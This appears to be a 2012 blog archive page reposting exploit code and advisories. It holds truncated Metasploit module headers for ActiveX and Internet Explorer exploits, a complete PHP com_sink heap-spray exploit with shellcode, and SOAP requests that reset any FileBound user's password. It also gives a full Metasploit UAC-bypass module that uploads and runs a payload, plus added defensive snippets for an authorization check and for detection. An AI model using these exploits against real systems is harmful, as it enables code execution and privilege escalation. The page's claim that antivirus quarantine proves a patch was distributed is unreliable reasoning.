Archive for 11 October 2012

NTR ActiveX Control StopModule() Remote Code Execution

NTR ActiveX Control StopModule remote code execution vulnerability

An update has been issued for this vulnerability. That it has been patched can be seen from the fact that Microsoft Security Essentials, Windows' own firewall and antivirus software, detects the exploit as malware and quarantines it. The exploit could not be copied in full; it is incomplete.

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking

    include Msf::Exploit::Remote::HttpServer::HTML
    include Msf::Exploit::Remote::BrowserAutopwn

    autopwn_info({
        :method     => "StopModule",
        :rank       => NormalRanking
    })

MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability

MS12-063 Microsoft Internet Explorer execCommand Use-After-Free vulnerability
With this vulnerability Internet Explorer can be abused remotely.

Code: it could not be copied in full, because Microsoft Security Essentials intervenes and quarantines it. So the security fix for this vulnerability has apparently been pushed by Microsoft to all computers.


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = GoodRanking

    include Msf::Exploit::Remote::HttpServer::HTML
    include Msf::Exploit::RopDb
    include Msf::Exploit::Remote::BrowserAutopwn

    autopwn_info({
        :ua_minver  => "7.0",
        :ua_maxver  => "9.0",
        :rank       => GoodRanking
    })

    def initialize(info={})
        super(update_info(info,
            'Name'           => "MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability",

PHP 5.3.4 Win Com Module Com_sink Exploit

The vulnerability found in the PHP 5.3.4 Windows COM module com_sink, and the local exploit for it

# Exploit Title: PHP 5.3.4 Win Com Module Com_sink Local Exploit
# Google Dork: Nil
# Date: 9/10/2012
# Author: FB1H2S
# Software Link: PHP Windows
# Version: [5.3.4]
# Tested on: Microsoft XP Pro 2002 SP2

<?php
// PHP 5.3.4 Windows COM module, com_event_sink()

//$eip = "\x44\x43\x42\x41";
$eip = "\x4b\xe8\x57\x78";
$eax = "\x80\x01\x8d\x04";
$deodrant = "";
// One spray block: the eip/eax pair repeated 0x80 times (1024 bytes)
$axespray = str_repeat($eip.$eax, 0x80);

//048d0190
echo strlen($axespray);
echo "PHP 5.3.4 WIN Com Module COM_SINK 0-day\n";
echo "By Rahul Sasi : http://twitter.com/fb1h2s\n";
echo "Exploit Tested on:\n Microsoft XP Pro 2002 SP2 \n";
echo "More Details Here:\n http://www.garage4hackers.com/blogs/8/web-app-remote-code-execution-via-scripting-engines-part-1-local-exploits-php-0-day-394/\n";

//19200 == 4B32 4b00
// Build the full spray buffer from 0x4B32 copies of the block
for ($axeeffect = 0; $axeeffect < 0x4B32; $axeeffect++) {
    $deodrant .= $axespray;
}

$terminate = "T";

$u[] = $deodrant;
$r[] = $deodrant.$terminate;
$a[] = $deodrant.$terminate;
$s[] = $deodrant.$terminate;

//$vVar = new VARIANT(0x048d0038+$offset); // This is what we control
$vVar = new VARIANT(0x048d0000+180);
// alert box shellcode
$buffer = "\x90\x90\x90".
          "\xB9\x38\xDD\x82\x7C\x33\xC0\xBB".
          "\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";

$var2 = new VARIANT(0x41414242);

com_event_sink($vVar, $var2, $buffer);
?>

FileBound 6.2 Privilege Escalation Vulnerability

FileBound 6.2 Privilege Escalation vulnerability
A local Windows vulnerability; the description of the vulnerability follows:

Sense of Security - Security Advisory - SOS-12-010

Release Date.              10-Oct-2012
Last Update.               -              
Vendor Notification Date.  14-Aug-2012
Product.                   FileBound On-Site
Platform.                  Windows
Affected versions.         All versions prior to 6.2
Severity Rating.           High
Impact.                    Privilege escalation
Attack Vector.             From remote with authentication
Solution Status.           Vendor patch
CVE reference.             CVE - not yet assigned

Details.
The FileBound On-Site document management application is 
vulnerable to a privilege escalation attack by sending a 
modified password request to the FileBound web service.
By modifying the UserID value you can reset the password 
of any local user in the application without requiring 
administrative privileges.

Proof of Concept.
Authenticate to FileBound via the following web service 
method and SOAP request:

http://www.company.com/Filebound.asmx?op=Login
   <soapenv:Body>
      <fil:Login>
         <fil:UserName>sosuser</fil:UserName>
         <fil:Password>daisyp0p</fil:Password>
      </fil:Login>
   </soapenv:Body>

After authentication a request can be sent to the following 
administrator's password reset web service method and 
SOAP request:

http://www.company.com/Filebound.asmx?op=SetPassword2
   <soapenv:Body>
      <fil:SetPassword2>
         <fil:UserID>32</fil:UserID>
         <fil:Password>lightsouthern</fil:Password>
         <fil:ResetPasswordExpires>0</fil:ResetPasswordExpires>
      </fil:SetPassword2>
   </soapenv:Body>

By modifying the UserID value the password can be reset for
any existing user in the system. A response code of -1 
confirms the password reset was successful.
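The authorization check that is missing here, written as an added example that is neither FileBound's code nor part of the advisory: it parses a SetPassword2 body shaped like the one above and refuses the reset when the UserID is not the caller's own and the Login session is not an administrator's. The fil namespace URI, the session record shape and the 0 "refused" return code are assumptions; the page only documents -1 for success.

```python
import xml.etree.ElementTree as ET

# The SOAP envelope URI is the standard one; the 'fil' URI is a placeholder,
# since the real FileBound namespace is not given in the advisory.
NS = {
    "soapenv": "http://schemas.xmlsoap.org/soap/envelope/",
    "fil": "urn:filebound-placeholder",
}

# Constructed request body, shaped like the advisory's SetPassword2 call.
SAMPLE_BODY = f"""<soapenv:Envelope xmlns:soapenv="{NS['soapenv']}" xmlns:fil="{NS['fil']}">
  <soapenv:Body>
    <fil:SetPassword2>
      <fil:UserID>32</fil:UserID>
      <fil:Password>lightsouthern</fil:Password>
      <fil:ResetPasswordExpires>0</fil:ResetPasswordExpires>
    </fil:SetPassword2>
  </soapenv:Body>
</soapenv:Envelope>"""


def parse_set_password2(body: str) -> dict:
    """Pull UserID and Password out of a SetPassword2 SOAP request."""
    root = ET.fromstring(body)
    call = root.find(".//fil:SetPassword2", NS)
    if call is None:
        raise ValueError("not a SetPassword2 request")
    uid = call.findtext("fil:UserID", namespaces=NS)
    pw = call.findtext("fil:Password", namespaces=NS)
    if uid is None or pw is None:
        raise ValueError("UserID and Password are required")
    return {"user_id": int(uid), "password": pw}


def authorize_set_password(session: dict, target_user_id: int) -> bool:
    """The missing check: a caller may reset only their own password,
    unless the authenticated session belongs to an administrator."""
    return bool(session.get("is_admin")) or target_user_id == session["user_id"]


def handle_set_password2(session: dict, body: str) -> int:
    """Return the advisory's -1 on success, or 0 (assumed code) when refused."""
    req = parse_set_password2(body)
    if not authorize_set_password(session, req["user_id"]):
        return 0
    # the actual reset of req["user_id"] to req["password"] would happen here
    return -1
```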

Solution.
Install the latest vendor patch.

Discovered by.
Nathaniel Carew from Sense of Security Labs.

About us.
Sense of Security is a leading provider of information security and
risk management solutions. Our team has expert skills in assessment 
and assurance, strategy and architecture, and deployment through to
ongoing management. We are Australia's premier application penetration
testing firm and trusted IT security advisor to many of the country's
largest organisations.


Sense of Security Pty Ltd 
Level 8, 66 King St
Sydney NSW 2000
AUSTRALIA

T: +61 (0)2 9290 4444
F: +61 (0)2 9290 4455
W: http://www.senseofsecurity.com.au/consulting/penetration-testing
E: info@senseofsecurity.com.au
Twitter: @ITsecurityAU

The latest version of this advisory can be found at:
http://www.senseofsecurity.com.au/advisories/SOS-12-010.pdf

Other Sense of Security advisories can be found at:
http://www.senseofsecurity.com.au/research/it-security-advisories.php

Windows Escalate UAC Execute RunAs

Windows Escalate UAC Execute RunAs vulnerability
Metasploit local exploit

Code:

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Local
	Rank = ExcellentRanking

	include Post::Common
	include Exploit::EXE
	include Post::File

	def initialize(info={})
		super( update_info( info,
			'Name'          => 'Windows Escalate UAC Execute RunAs',
			'Description'   => %q{
				This module will attempt to elevate execution level using
				the ShellExecute undocumented RunAs flag to bypass low
				UAC settings.
			},
			'License'       => MSF_LICENSE,
			'Author'        => [
					'mubix <mubix[at]hak5.org>' # Port to local exploit
				],
			'Version'       => '$Revision$',
			'Platform'      => [ 'windows' ],
			'SessionTypes'  => [ 'meterpreter' ],
			'Targets'       => [ [ 'Windows', {} ] ],
			'DefaultTarget' => 0,
			'References'    => [
				[ 'URL', 'http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html' ]
			],
			'DisclosureDate'=> "Jan 3, 2012"
		))

		register_options([
			OptString.new("FILENAME", [ false, "File name on disk"]),
			OptString.new("PATH", [ false, "Location on disk %TEMP% used if not set" ]),
			OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", true ])
		])

	end

	def exploit

		root_key, base_key = session.sys.registry.splitkey("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System")
		open_key = session.sys.registry.open_key(root_key, base_key)
		lua_setting = open_key.query_value('EnableLUA')

		if lua_setting.data == 1
			print_status "UAC is Enabled, checking level..."
		else
			print_good "UAC is not enabled, no prompt for the user"
		end

		uac_level = open_key.query_value('ConsentPromptBehaviorAdmin')

		case uac_level.data
		when 2
			print_status "UAC is set to 'Always Notify'"
			print_status "The user will be prompted, wait for them to click 'Ok'"
		when 5
			print_debug "UAC is set to Default"
			print_debug "The user will be prompted, wait for them to click 'Ok'"
		when 0
			print_good "UAC is not enabled, no prompt for the user"
		end


		#
		# Generate payload and random names for upload
		#
		payload = generate_payload_exe

		if datastore["FILENAME"]
			payload_filename = datastore["FILENAME"]
		else
			payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
		end

		if datastore["PATH"]
			payload_path = datastore["PATH"]
		else
			payload_path = session.fs.file.expand_path("%TEMP%")
		end

		cmd_location = "#{payload_path}\\#{payload_filename}"

		if datastore["UPLOAD"]
			print_status("Uploading #{payload_filename} - #{payload.length} bytes to the filesystem...")
			fd = session.fs.file.new(cmd_location, "wb")
			fd.write(payload)
			fd.close
		end

		session.railgun.shell32.ShellExecuteA(nil,"runas",cmd_location,nil,nil,5)

	end
end
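A detection for the drop-and-runas pattern this module implements, written as an added example that is not part of the Metasploit module: it flags a high-integrity process whose image is a random alphabetic name under %TEMP%, matching the module's Rex::Text.rand_text_alpha(rand(8)+6) + ".exe" naming and its default %TEMP% upload path. The key=value record format and the sample records are constructed, in the style of Sysmon Event ID 1 field names.

```python
import re

# %TEMP% under a default Windows profile, and the module's random file name:
# rand_text_alpha(rand(8)+6) yields 6..13 letters, followed by ".exe".
TEMP_DIR_RE = re.compile(r"\\Users\\[^\\]+\\AppData\\Local\\Temp\\", re.IGNORECASE)
RANDOM_EXE_RE = re.compile(r"\\[A-Za-z]{6,13}\.exe$")

# Constructed process-creation records (Sysmon Event ID 1 style field names,
# flattened to key=value pairs); not real captured logs.
SAMPLE_RECORDS = [
    r"Image=C:\Users\alice\AppData\Local\Temp\qwLkjZpa.exe|IntegrityLevel=High|ParentImage=C:\Windows\explorer.exe",
    r"Image=C:\Users\alice\AppData\Local\Temp\setup.exe|IntegrityLevel=Medium|ParentImage=C:\Windows\explorer.exe",
    r"Image=C:\Program Files\Vendor\app.exe|IntegrityLevel=High|ParentImage=C:\Windows\explorer.exe",
]


def parse_record(line: str) -> dict:
    """Split 'key=value|key=value' into a dict (values may contain '=')."""
    return dict(field.split("=", 1) for field in line.split("|"))


def is_runas_drop(rec: dict) -> bool:
    """True for a High-integrity process whose image is a random-looking .exe in %TEMP%.
    High integrity is what the accepted 'runas' consent prompt produces."""
    image = rec.get("Image", "")
    return (rec.get("IntegrityLevel") == "High"
            and TEMP_DIR_RE.search(image) is not None
            and RANDOM_EXE_RE.search(image) is not None)


def find_suspicious(records) -> list:
    """Return the image paths of all records matching the pattern."""
    return [rec["Image"] for rec in map(parse_record, records) if is_runas_drop(rec)]
```

Legitimate installers launched from %TEMP% produce the same shape, so a hit is a triage lead to correlate with the consent prompt the user accepted (ConsentPromptBehaviorAdmin is 0 only if no prompt was shown), not a verdict on its own.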